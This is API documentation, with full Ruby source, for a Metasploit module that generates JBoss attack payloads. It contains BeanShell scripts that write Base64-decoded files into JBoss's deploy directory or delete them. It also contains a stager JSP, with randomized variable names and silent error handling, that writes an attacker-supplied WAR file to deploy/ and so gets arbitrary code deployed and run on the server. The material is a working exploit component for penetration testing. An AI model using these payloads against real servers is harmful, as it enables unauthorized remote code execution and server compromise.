Module: Msf::Exploit::Remote::HTTP::JBoss::BeanShellScripts

Included in:
Msf::Exploit::Remote::HTTP::JBoss
Defined in:
lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb


Instance Method Details

#create_file_bsh(opts = {}) ⇒ String

Generates a Bean Shell script that creates a file inside JBoss's deploy directory.

Parameters:

  • opts (Hash) (defaults to: {})

    Hash containing the options to create the Bean Shell Script.

Options Hash (opts):

  • :dir (Symbol)

    The directory in which to place the file.

  • :file (Symbol)

    The file path.

  • :contents (Symbol)

    The file contents.

Returns:

  • (String)

    A Bean Shell script to create the file.


# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 67

# Builds the text of a Bean Shell script that creates a directory and writes
# one file beneath `<jboss.server.home.dir>/deploy/`.
#
# The script Base64-decodes the `:contents` value before writing it, so that
# value is expected to be Base64 text. All three option values are
# interpolated into the script verbatim: nothing here escapes or validates
# them, so quoting is entirely the caller's responsibility.
#
# The generated script depends on the JDK-internal `sun.misc.BASE64Decoder`
# class. On a host where it runs, the visible artifacts are the directory and
# the file created under `deploy/`.
#
# @param opts [Hash] options used to fill in the script template
# @option opts [#to_s] :dir directory created under `deploy/`
# @option opts [#to_s] :file path of the written file, relative to `deploy/`
# @option opts [#to_s] :contents Base64 text decoded by the script
# @return [String] the Bean Shell script source
def create_file_bsh(opts = {})
  target_dir, target_file, encoded_body = opts.values_at(:dir, :file, :contents)

  # `<<-` keeps the body's own indentation, so the template stays at column 0.
  <<-BSH
import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

String val = "#{encoded_body}";

BASE64Decoder decoder = new BASE64Decoder();
String jboss_home = System.getProperty("jboss.server.home.dir");
new File(jboss_home + "/deploy/#{target_dir}").mkdir();
byte[] byteval = decoder.decodeBuffer(val);
String location = jboss_home + "/deploy/#{target_file}";
FileOutputStream fstream = new FileOutputStream(location);
fstream.write(byteval);
fstream.close();
  BSH
end

#delete_files_bsh(opts = {}) ⇒ String

Generates a Bean Shell script that deletes files from JBoss's /deploy directory.

Parameters:

  • opts (Hash) (defaults to: {})

    Hash whose values are the paths of the files to delete.

Returns:

  • (String)

    A Bean Shell script to delete files.


# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 97

# Builds the text of a Bean Shell script that deletes files beneath
# `<jboss.server.home.dir>/deploy/`.
#
# Only the hash values are used; the keys are ignored. Each value is
# interpolated verbatim into a `new File(...).delete()` statement, with no
# escaping or path validation performed here.
#
# @param opts [Hash] hash whose values are paths relative to `deploy/`
# @return [String] the Bean Shell script source; just the `jboss_home`
#   declaration when `opts` is empty
def delete_files_bsh(opts = {})
  delete_statements = opts.values.map do |relative_path|
    %Q[new File(jboss_home + "/deploy/#{relative_path}").delete();\n]
  end

  %Q[String jboss_home = System.getProperty("jboss.server.home.dir");\n] + delete_statements.join
end

#generate_bsh(type, opts = {}) ⇒ String

Generates a Bean Shell Script.

Parameters:

  • type (Symbol)

    The Bean Shell script type, `:create` or `:delete`.

  • opts (Hash) (defaults to: {})

    Hash of configuration options.

Returns:

  • (String)

    A Bean Shell script.


# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 10

# Dispatches to the Bean Shell script builder that matches `type`.
#
# @param type [Symbol] `:create` selects {#create_file_bsh}, `:delete`
#   selects {#delete_files_bsh}
# @param opts [Hash] options passed through unchanged to the selected builder
# @return [String, nil] the generated script, or nil when `type` is neither
#   `:create` nor `:delete`
def generate_bsh(type, opts = {})
  # A `case` with no matching branch evaluates to nil, which is the
  # fall-through result for an unrecognised type.
  case type
  when :create then create_file_bsh(opts)
  when :delete then delete_files_bsh(opts)
  end
end

#stager_jsp(app_base) ⇒ String

Generate a stager JSP to write a WAR file to the deploy/ directory. This is used to bypass the size limit for GET/HEAD requests.

Parameters:

  • app_base (String)

    The name of the WAR app to write.

Returns:

  • (String)

    The JSP stager.


# File 'lib/msf/core/exploit/http/jboss/bean_shell_scripts.rb', line 27

# Builds the source of a JSP page that Base64-decodes the value of the first
# request parameter and writes the result to
# `<jboss.server.home.dir>/deploy/<app_base>.war`.
#
# The Java local variable names are random alphabetic strings of 8 to 15
# characters, so they differ on every call; `parameterName`, the imports and
# the overall structure are fixed text. `app_base` is interpolated verbatim
# with no escaping. The generated page swallows every exception in an empty
# `catch` block, so a failed write produces no error output from the JSP.
#
# @param app_base [String] base name (without `.war`) of the file written
#   under `deploy/`
# @return [String] the JSP source
def stager_jsp(app_base)
  # Names are drawn in the same order as the Java variables they label:
  # decoded bytes, target path, server home, output stream, request content.
  decoded_name, path_name, home_name, stream_name, body_name =
    Array.new(5) { Rex::Text.rand_text_alpha(8 + rand(8)) }

  # `<<-` keeps the body's own indentation, so the template stays as written.
  <<-JSP
<%@page import="java.io.*,
  java.util.*,
  sun.misc.BASE64Decoder"
%>
<%
String #{home_name} = System.getProperty("jboss.server.home.dir");
String #{path_name} = #{home_name} + "/deploy/" + "#{app_base}.war";
try {
  String #{body_name} = "";
  String parameterName = (String)(request.getParameterNames().nextElement());
  #{body_name} = request.getParameter(parameterName);
  FileOutputStream #{stream_name} = new FileOutputStream(#{path_name});
  byte[] #{decoded_name} = new BASE64Decoder().decodeBuffer(#{body_name});
  #{stream_name}.write(#{decoded_name});
  #{stream_name}.close();
}
catch(Exception e){ }
%>
  JSP
end